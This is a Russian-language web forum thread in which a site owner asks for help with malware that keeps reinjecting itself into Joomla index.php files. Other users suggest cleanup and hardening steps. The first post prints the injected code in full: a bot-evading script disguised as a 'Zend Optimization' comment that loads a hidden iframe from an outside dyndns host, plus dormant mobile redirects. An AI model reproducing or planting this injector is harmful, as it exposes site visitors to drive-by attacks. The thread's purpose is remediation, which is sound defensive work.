[Vmir]

Доброго времени суток многоуважаемые форумчане. Словил вирус, прошу помощи в решении вопроса.

В данный момент на хостинге 5 сайтов ( 1 – vamshop, остальные на Joomla 1.5 и 2.5)

Как я понимаю работает робот, так как я делал бэки файлов, но код продолжает генерироваться после какого то времени.

Насколько я понял из накопанной информации и последующей проверки вредоносный код генерируется в 2 файла - в корне index.php, а так же в файл administrator/index/php, со следующим содержимым:

код

<?php
/*Proccessing Zend Optimization ver 1.0.0.1*/
ob_start();

echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://paleciru.dyndns-web.com/eqxa.cgi?default\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){
}else{
asd61234tkhjasd454hfhf235();
}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{
//setTimeout(function(){window.location=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";},1000);
}
catch(err) {
//window.location=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";location.href=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";
}
}
}
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";

/*Proccessing Zend Optimization ver 1.0.0.1*/
?>

[свернуть]

Так же при новой генерации этого кода меняются права на файлы, я ставил 444, а обнаруживаю 644 .

[ArhStrAngeR]

Vmir, пакуете сайты на сервере, скачиваете себе. На сервере все зачищаете, предварительно прогнав антивирусом для пущей безопасности и для того, чтобы приметить новые места, на которые он ругнется. Затем зачищаете все подчистую и меняете данные доступа.

Затем в той копии, которую скачали - вычищаете вирусы, прогоняете антивирусами на локалхосте и заливаете на сервер.

Естественно данные доступа к сайтам, фтп и хостингу сменить обязательно. Так же проверить секретные вопросы на почте, чтобы были достаточно сложными.
Если вирус появился опять - повторять до исчезновения. Скорее всего пропустили какое-то одно место, откуда он себя и распространил.

[Gunkin]

А что Яндекс Вебмастер говорит? Похоже на мобильный редирект, *.js проверяли?
Можно адреса сайтов в личку.

[luserz]

1.Сначала скачай резервную копию на сайт. Прогани антивирусом, советовал бы касперского....это единственный антивирус, который мне помог реально.

2.Далее посмотри Dr.Web CureIt!

3.Потом открой index файл найди шифр закодированный в base64 Обычно он в начале или в конце, в редких случаях он в середине. Берешь total comander и ищи во всех файлах этот кодированный кусок.

4. Посмотри любой .js там такой же должен быть зашифрованный base64.

5. Посмотри папки с картинками, иногда вирусня добавляется в качестве картинки. Найдешь битую, удаляй.

6. Закрывайте ftp доступ на хостинге + если надо большое кол-во фоток загрузить или еще чего-нибудь открывайте,но только на то время пока заливайте и не пользуйтесь filezila крякнутыми, лучше total commanderom....пишут, что через зилу чаще всего заражают . (Вирус заноситься как и на компе через файловую систему по ftp-менеджеру.....редиректы и всякий хлам)

7. Ставишь
-а. jsecure authentication
-б. Admin tools
Они делают все что нужно.
а)Скрывает прямой адрес /administrator, на какой-нибудь с ключом Пр:/administrator?12345. Блокирует IP
б)Изменяет префикс таблицы,и меняет пользователя.

8. Паролиш папку с админкой, через htpasswd.

9. Закрываешь доступ через htaccess по ip адресу. И оставляешь только свой ip.

Вот наверно краткий мануал, для тех у кого в дальнейшем может развиться паранойя для безопасности от хаков. Если будет интересно , могу скинуть в личку список самых распространенных вирусов, которые я сам нашел просмотрев 1000 php скриптов, когда у меня была аналогичная проблема. Либо, если получу много плюсиков, могу скинуть сюда этот список))))))))))

[Ymacker]

Всегда лечение сайта стоит начинать с просмотра логов. Можно до потери пульса менять права на папки и каждый день обнаруживать, что всё вернулось на круги своя. Хороший бэкдор - это пара строчек кода, пока не найдёшь его чёрный ход, излечить будет сложно.
Места включений стороннего кода, зачастую можно увидеть хромом. Но опять же повторюсь, надо лечить болезнь, а не проявления. Менять права на папки, пароли на админки и панели стоит менять, когда найдёшь точку входа: запароленная панелька шела, бэкдор
P.S. удачи

[Gunkin]

В последнее время встречал проблемы именно на серверах хостера, файлы пользователей тут не при чем. После вмешательства службы поддержки проблемы решались, а танцы с бубном пользователей хостинга ни к чему не приводили - код появлялся заново через несколько дней.

[altry1st]

Тоже столкнулся с данной проблемой. Вирус заражает ВСЕ сайты на джумле на акк. Вроде вылечишь их бэкапом, сменишь пароли - через некоторое время опять все сайты заражены. Короче ппц какой-то...

[Vmir]

Большое спасибо всем, кто откликнулся!

Пробую разные схемы для решения вопроса. Как только пойму, что вируса больше нет, обязательно отпишусь.

[3s777]

altry1st, у меня так целая история была с подобной проблемой. Тут описывал

[altry1st]

altry1st, у меня так целая история была с подобной проблемой. Тут описывал

Я хостеру тоже отписался, он прогнал все сайты айболитом (ai-bolit), в итоге обнаружено куча шелов и сигнатур вирусов. Хостер перекидывает стрелки, что бы обращался к специалистам с решением. Не знаю, попробую скачать файлы к себе, пролечить антивирусами на локалке, дальше видно будет. Но это попандос конечно, кучу времени сжирает.

P.S. они обещают (хостинг) в ближайшее время ввести разделение сайтов в пределах одного акк, что бы не было такого, что заражаются сразу все...